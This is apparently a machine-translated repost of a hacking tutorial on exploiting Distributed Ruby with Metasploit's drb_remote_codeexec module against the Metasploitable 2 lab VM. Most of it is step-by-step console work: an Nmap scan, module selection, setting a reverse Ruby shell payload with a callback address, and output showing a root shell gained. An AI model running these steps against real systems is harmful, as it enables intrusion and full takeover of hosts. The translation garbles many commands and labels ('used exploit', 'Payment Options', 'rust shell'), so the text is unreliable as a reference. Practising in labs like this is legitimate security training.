قالب وردپرس درنا توس
Home / Tips and Tricks / Hack distributed Ruby with Metasploit & Execute external code execution «Zero Byte :: WonderHowTo

Hack distributed Ruby with Metasploit & Execute external code execution «Zero Byte :: WonderHowTo



Things that will make life easier for developers and users are often simple targets for exploiting hackers. Like many situations in the technology world, it is usually a compromise between convenience and security. Such a trade-off is found in a system called Distributed Ruby, which can easily be compromised by Metasploit.

Overview of Distributed Ruby

Distributed Ruby, also known as dRuby or DRb, is a distributed object system for Ruby programming languages ​​that enables long-distance calls between Ruby processes, although available on different machines. It uses its own protocol and is entirely written in pure Ruby.

This provides a flexible service that developers can use to improve certain applications, but it also opens a security error when not properly executed, for example in older versions of dRuby. Because this is usually used for smaller projects and beginners programs, there is not much concern about security issues.

The Metasploit module we are going to use automatically tries to exploit the vulnerable instance and syscall methods to compromise service and get a shell. We will test this on Metasploitable 2, a deliberately vulnerable virtual machine that runs an insecure version of dRuby.

Step 1
: Verify Vulnerability

The first thing we need to do is confirm that Distributed Ruby (dRuby) is running on our target. Once dRuby is set up, it binds to a specific URI and port, in this case port 8787. We can run a Nmap scan on this port to make sure.

Use the -sV flag to identify service and version information followed by the target's IP address and finally set port 8787 with the -p flag because this port is outside the Nmap default list of regular ports being scanned. [.Alpha.] D = 172.16.1.102 -p 8787

[*] exec: nmap-sV 172.16.1.102-p 8787

Start Nmap 7.70 (https://nmap.org) at 2019-01-15 10:07 CST
Nmap scan report for 172.16.1.102
Values ​​are up (0.0013s latency).

PORT STATE SERVICE VERSION
8787 / tcp open drb Ruby DRb RMI (Ruby 1.8, run /usr/lib/ruby/1.8/drb)
MAC Address: 08: 00: 27: 77: 62: 6C (Virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 hosted) scanned 19.65 seconds

We can see that the dRuby service is present and running. Let's look for an exploitation to use.

Step 2: Search for an Exploitation

Look up Metasploit with msfconsole and type search drb to display some matching results.

  msf> search drb

Matching modules
================

Name Disclosure Date Rank Check Description
------------------ -----------
exploit / linux / misc / drb_remote_codeexec 2011-03-23 ​​excellent No Distributed Ruby Remote Code Execution
utilize / multi / misc / wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
explode / multi / misc / wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow 

It looks like drb_remote_codeexec is exactly what we need. Upload exploit with the command used followed by the module path.

  msf> used exploit / linux / misc / drb_remote_codeexec 

Now that we are placed within this module we can see information about it with the command info .

  msf exploit (linux / misc / drb_remote_codeexec)> info

Name: Distributed Ruby Remote Code Execution
Module: exploit / linux / misc / drb_remote_codeexec
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Published: 23/03/2011

Provided by:
joernchen 

Available Goals:
Id Name
- ----
0 Automatic
1 trap
2 Eval
3 Syscall

Check support:
No

Basic Options:
Name Current setting Mandatory Description
---- --------------- -------- -----------
RHOST no Target address
RPORT 8787 yes Target port
URI no URI for target values ​​(druby: // host: port) (overrides RHOST / RPORT)

Payload information:
Space: 32768

Description:
This module utilizes remote code execution vulnerabilities in dRuby.

references:
CVE: Not available
http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
http://bugkraut.de/posts/tainting

This gives us some details about the exploitation, such as platform information, the first disclosure date of the vulnerability and options available for this exploitation.

Step 3: Start Exploit

Now we are ready to set up our options. We can set the target IP address with the command set rhost .

  msf exploit (linux / misc / drb_remote_codeexec)> set rhost 172.16.1.102

rhost => 172.16.1.102 

We can then see available payloads for this module with the command payload .

  msf exploit (linux / misc / drb_remote_codeexec)> view payload

Compatible payloads
===================

Name Disclosure Date Rank Check Description
------------------ -----------
cmd / unix / bind_awk normal No Unix Command Shell, bind TCP (via AWK)
cmd / unix / bind_busybox_telnetd normal No Unix Command Shell, bind TCP (via BusyBox telnetd)
cmd / unix / bind_lua normal No Unix Command Shell, bind TCP (via Lua)
cmd / unix / bind_netcat normal No Unix Command Shell, bind TCP (via netcat)
cmd / unix / bind_netcat_gaping normal No Unix Command Shell, bind TCP (via netcat -e)
cmd / unix / bind_netcat_gaping_ipv6 normal No Unix Command Shell, bind TCP (via netcat -e) IPv6
cmd / unix / bind_nodejs normal No Unix Command Shell, bind TCP (via nodejs)
cmd / unix / bind_perl normal No Unix Command Shell, bind TCP (via Perl)
cmd / unix / bind_perl_ipv6 normal No Unix Command Shell, bind TCP (via perl) IPv6
cmd / unix / bind_r normal No Unix Command Shell, bind TCP (via R)
cmd / unix / bind_ruby normal No Unix Command Shell, bind TCP (via Ruby)
cmd / unix / bind_ruby_ipv6 normal No Unix Command Shell, bind TCP (via Ruby) IPv6
cmd / unix / bind_socat_udp normal No Unix Command Shell, bind UDP (via socat)
cmd / unix / bind_stub normal No Unix Command Shell, bind TCP (stub)
cmd / unix / bind_zsh normal No Unix Command Shell, bind TCP (via Zsh)
cmd / unix / generic normal No Unix Command, Generic Command Execution
cmd / unix / reverse normal No Unix Command Shell, double-reverse TCP (telnet)
cmd / unix / reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
cmd / unix / reverse_bash normal No Unix Command Shell, Reverse TCP (/ dev / tcp)
cmd / unix / reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
cmd / unix / reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
cmd / unix / reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
cmd / unix / reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
cmd / unix / reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
cmd / unix / reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
cmd / unix / reverse_nodejs normal No Unix Command Shell, Reverse TCP (via node)
cmd / unix / reverse_openssl normal No Unix Command Shell, double-reverse TCP SSL (openssl)
cmd / unix / reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
cmd / unix / reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
cmd / unix / reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
cmd / unix / reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
cmd / unix / reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
cmd / unix / reverse_r normal No Unix Command Shell, Reverse TCP (via R)
cmd / unix / reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
cmd / unix / reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd / unix / reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
cmd / unix / reverse_ssl_double_telnet normal No Unix Command Shell, double-reverse TCP SSL (telnet)
cmd / unix / reverse_stub normal No Unix Command Shell, Reverse TCP
cmd / unix / reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
generic / custom normal no custom payload
generic / shell_bind_tcp normal No Generic Command Shell, bind TCP Inline
generic / shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline 

As you can see, there are a lot of options here. For now we will use a reverse command case in Ruby. Use set payload to assign the appropriate payload.

  msf exploit (linux / misc / drb_remote_codeexec)> Enter payload cmd / unix / reverse_ruby

payload => cmd / unix / reverse_ruby 

Now we can show the current settings to see where we are. Use the command .

  msf exploit (linux / misc / drb_remote_codeexec)> options

Module Options (exploit / linux / misc / drb_remote_codeexec):

Name Current setting Mandatory Description
---- --------------- -------- -----------
RHOST 172.16.1.102 no Target address
RPORT 8787 yes Target port
URI no URI for target values ​​(druby: // host: port) (overrides RHOST / RPORT)

Payment Options (cmd / unix / reverse_ruby):

Name Current setting Mandatory Description
---- --------------- -------- -----------
LHOST yes Listen address (an interface can be specified)
LPORT 4444 yes The listening gate

Utnyttjemål:

Id Name
- ----
0 Automatic 

Since we entered a reverse shell as our payload, we need to specify a listening address for the shell to call back – this will be our local machine's IP address. Use set lhost to assign it now.

  msf exploit (linux / misc / drb_remote_codeexec)> set lhost 172.16.1.100

lhost => 172.16.1.100 

Step 4: Get a Shell

We should be good to go. Type utilize at the prompt, or drive which does exactly the same but is only shorter. We should see the attack launch and try a few methods to exploit the goal.

  msf exploit (linux / misc / drb_remote_codeexec)> run

[*] Started reverse TCP manager at 172.16.1.100:4444
[*] Trying to use instance_eval method
[!] Goals are not vulnerable to the example_eval method
[*] Trying to use the syscall method
[*]x86 attempts to execute .JU4AK4Gh3sOBkaB7
[+] Deleted .JU4AK4Gh3sOBkaB7

who am I
root
uname -a
Linux metasploitable 2.6.24-16 server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
IP address
1: lo: 16436 qdisc noqueue
link / loopback 00: 00: 00: 00: 00: 00 hour 00: 00: 00: 00: 00: 00
in a 127.0.0.1/8 range worth lo
inet6 :: 1/128 scope host
valid_lft forever preferred_lft forever
2: Eto: [m] 1500 qdisc pfifo_fast qlen 1000
link / ether 08: 00: 27: 77: 62: 6c brdff: ff: ff: ff: ff: ff
inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
inet6 fe80 :: a00: 27ff: fe77: 626c / 64 scope link
valid_lft forever preferred_lft forever 

When successful, there should be a flashing cursor as the prompt. We can now execute any command we want, such as whoami to display the current user uname -a to display system information and ip address to verify that we have a shell on the target system. Since we now have a root shell we own the system and can basically do what we want.

Wrapping Up

In this article, we learned how a simple service aimed at providing enhanced functionality to programs could be utilized with the goal of achieving root access. Because Distributed Ruby was designed to allow remote access between processes, built-in safety holes were unintentionally opened. We saw how easy we could get a rust shell on the target system, again proving how powerful Metasploit is.

Don't miss: Ultimate Command Cheat Sheet for Metasploit's Meter Preter

] Cover image of Peter-Lomas / Pixabay; Screenshots of drd_ / Zero Byte

Source link